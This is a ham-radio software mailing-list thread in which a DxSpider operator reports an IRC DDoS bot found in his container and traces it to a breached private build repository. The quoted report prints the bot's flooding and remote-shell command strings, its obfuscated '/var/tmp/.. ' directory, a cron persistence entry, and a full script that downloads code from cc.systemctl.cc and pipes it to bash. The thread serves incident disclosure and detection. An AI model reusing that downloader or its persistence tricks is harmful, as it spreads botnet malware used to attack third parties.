[Dxspider-support] Fwd: UPDATE: Suspicious traffic in my container - Scanbot
Patrick Skerrett
patrick at skerrett.net
Sat Sep 6 18:46:28 BST 2025
FYI- I tracked it down. Sorry for the alarm.
---------- Forwarded message ---------
From: Patrick Skerrett <patrick at skerrett.net>
Date: Sat, Sep 6, 2025 at 12:45 PM
Subject: UPDATE: Suspicious traffic in my container - Scanbot
To: <sysops at dxcluster.info>
I believe I tracked the source of this down.
The docker container build code that I use is stored on a private github
repo. It looks like the repo itself was breached, and the malicious code
was inserted into the build process itself.
So when we built & re-deployed the dxspider container the other day, the
container was built with the IRC bot inserted into the build process
itself. So the IRC launcher started up with the container.
That explains why the code was running as sysop, and it got into a private
container without any other external access...
I am NOT using a public repo for the build, so anyone using a public Docker
container for Dxspider is likely fine... This was a breach of my private
code repository.
I think we are OK, and sorry for the alarm, but it doesn't hurt to check
anyway for anomalous processes...
73,
Pat S.
On Sat, Sep 6, 2025 at 10:42 AM Patrick Skerrett <patrick at skerrett.net>
wrote:
> I run DxSpider as a docker container on my swarm cluster. I had a ping
> this morning from my IDS router that there was some command & control
> traffic to IRC coming from the node that runs DxSpider.
>
> In looking, I found what looks like a DDOS bot deployed on my node, as the
> user 'sysop' (that the DXSpider user runs under).
>
> *************
> Considering the DXSpider server runs in an isolated container and the
> suspicious files were written as the 'sysop' owner, I think I have to
> conclude there is a vulnerability in the DxSpider software that allowed
> this payload to be deployed!!
> *********
>
> Here is the relevant info:
>
> Payload was written to "/var/tmp/.. /" (that is "dot dot space").
>
> Obfuscated directory name to make it hard to navigate to.
>
> The process itself is a compiled application called '-bash'
>
> Trying to view it in a hex editor, I discovered these strings:
>
> root@node3:/var/tmp/.. /bot# strings "/var/tmp/.. /bot/-bash" | grep -E "(http|tcp|connect|socket|bot|scan)" | head -10
> NOTICE %s :Unable to create socket.
> http://
> NOTICE %s :Unable to connect to http.
> NOTICE %s :GET <http address> <save as> = Downloads a file off the web and saves it onto the hd
> [32m botnet
> [36m E.G %s -h bot -n nick -i ident -r name -c #chan -k key -xu user -xp
> pass
> [37m bot nick is required e.g
> [37m bot ident is required e.g
> [37m bot realname is required e.g
> Not a socket
>
> root@node3:/var/tmp/.. /bot# strings "/var/tmp/.. /bot/-bash" | grep -E "(PING|PONG|JOIN|PRIVMSG|MODE)" | head -10
> MODE %s +xi
> JOIN %s :%s
> PONG %s
> JOIN %s
> MODE %s +o %s
> PRIVMSG
> PING
> JOIN
> DT_JOINABLE
> _PRIVMSG
>
> root@node3:/var/tmp/.. /bot# strings "/var/tmp/.. /bot/-bash" | grep -i "NOTICE"
> NOTICE %s :Unable to comply.
> NOTICE %s :GET <host> <save as>
> NOTICE %s :Unable to create socket.
> NOTICE %s :Unable to resolve address.
> NOTICE %s :Unable to connect to http.
> NOTICE %s :Receiving file.
> NOTICE %s :Saved as %s
> NOTICE %s :Spoofs: %d.%d.%d.%d
> NOTICE %s :Spoofs: %d.%d.%d.%d - %d.%d.%d.%d
> NOTICE %s :Bot by anonymous
> NOTICE %s :NICK <nick>
> NOTICE %s :Nick cannot be larger than 9 characters.
> NOTICE %s :DISABLE <pass>
> NOTICE %s :Current status is: %s.
> NOTICE %s :Already disabled.
> NOTICE %s :Password too long! > 254
> NOTICE %s :Disable sucessful.
> NOTICE %s :ENABLE <pass>
> NOTICE %s :Already enabled.
> NOTICE %s :Wrong password
> NOTICE %s :Password correct.
> NOTICE %s :Removed all spoofs
> NOTICE %s :What kind of subnet address is that? Do something like: 169.40
> NOTICE %s :Unable to resolve %s
> NOTICE %s :UDP <target> <port> <secs>
> NOTICE %s :Packeting %s.
> NOTICE %s :PAN <target> <port> <secs>
> NOTICE %s :Panning %s.
> NOTICE %s :TSUNAMI <target> <secs>
> NOTICE %s :Tsunami heading for %s.
> NOTICE %s :UNKNOWN <target> <secs>
> NOTICE %s :Unknowning %s.
> NOTICE %s :MOVE <server>
> NOTICE %s :TSUNAMI <target> <secs> = Special packeter that wont be blocked by most firewalls
> NOTICE %s :PAN <target> <port> <secs> = An advanced syn flooder that will kill most network drivers
> NOTICE %s :UDP <target> <port> <secs> = A udp flooder
> NOTICE %s :UNKNOWN <target> <secs> = Another non-spoof udp flooder
> NOTICE %s :NICK <nick> = Changes the nick of the client
> NOTICE %s :SERVER <server> = Changes servers
> NOTICE %s :GETSPOOFS = Gets the current spoofing
> NOTICE %s :SPOOFS <subnet> = Changes spoofing to a subnet
> NOTICE %s :DISABLE = Disables all packeting from this client
> NOTICE %s :ENABLE = Enables all packeting from this client
> NOTICE %s :KILL = Kills the client
> NOTICE %s :GET <http address> <save as> = Downloads a file off the web and saves it onto the hd
> NOTICE %s :VERSION = Requests version of client
> NOTICE %s :KILLALL = Kills all current packeting
> NOTICE %s :HELP = Displays this
> NOTICE %s :IRC <command> = Sends this command to the server
> NOTICE %s :SH <command> = Executes a command
> NOTICE %s :Killing pid %d.
> NOTICE %s :%s
>
> This is obviously bad stuff.
>
>
> **** HOW TO DETECT IF THIS IS ON YOUR NODE****
>
> As sudo:
> ps -ef |grep ScanBot
> sysop 1990 1 0 09:40 ? 00:00:00 ScanBot
>
> # ls -l "/var/tmp/.. /"
> total 5340
> -rw-r----- 1 sysop sysop 72770 Sep 6 09:39 block.lst
> drwxr-xr-x 2 sysop sysop 4096 Apr 3 02:55 bot
> -rwxr-xr-x 1 sysop sysop 855 Feb 12 2023 clear
> -rwxr-xr-x 1 sysop sysop 3272064 Oct 12 2023 curl
> drwxr-xr-x 2 sysop sysop 4096 Sep 6 09:31 pass_files
> -rwxr-xr-x 1 sysop sysop 2094872 Jul 13 2024 rm
> -rwxr-xr-x 1 sysop sysop 499 Sep 6 09:29 scanbot
> -rw-r--r-- 1 sysop sysop 0 Sep 6 10:35 scanbot.lst
> drwxr-xr-x 2 sysop sysop 4096 Dec 7 2023 screen
>
> It created a crontab entry for the sysop user:
> /var/spool/cron/crontabs/sysop
> root@node3:/var/tmp# cat /var/spool/cron/crontabs/sysop
> # DO NOT EDIT THIS FILE - edit the master and reinstall.
> # (- installed on Sat Sep 6 09:29:49 2025)
> # (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
> * * * * * "/var/tmp/.. "/scanbot
>
> It runs every minute and tries to re-download itself:
>
> #!/bin/bash
>
> cd "/var/tmp/.. "
> shopt -s expand_aliases
> alias curl="./curl"
> type="randomscan"
> host="cc.systemctl.cc"
> api="scanbot.sh"
> brute_type="spirit"
> pubnick="sysop@98.46.184.64"
> privnick="sysop@98.46.143.4"
> scanbot()
> {
>     url="$1"
>     if [ ! -z "$url" ]; then
>         url="url = \"$url\""
>         curl -K - << EOF
> ipv4
> fail
> silent
> connect-timeout = 60
> max-time = 120
> retry = 2
> $url
> EOF
>         sync
>     fi
> }
> scanbot $host/$api?type=$type\&brute_type=$brute_type\&pubnick=$pubnick\&privnick=$privnick | bash
>
> ************
> Please check to see if anyone is running this process, if so, we may have
> a vulnerability that would allow the DXSpider cluster to become a DDOS C&C
> vector!!!
> ********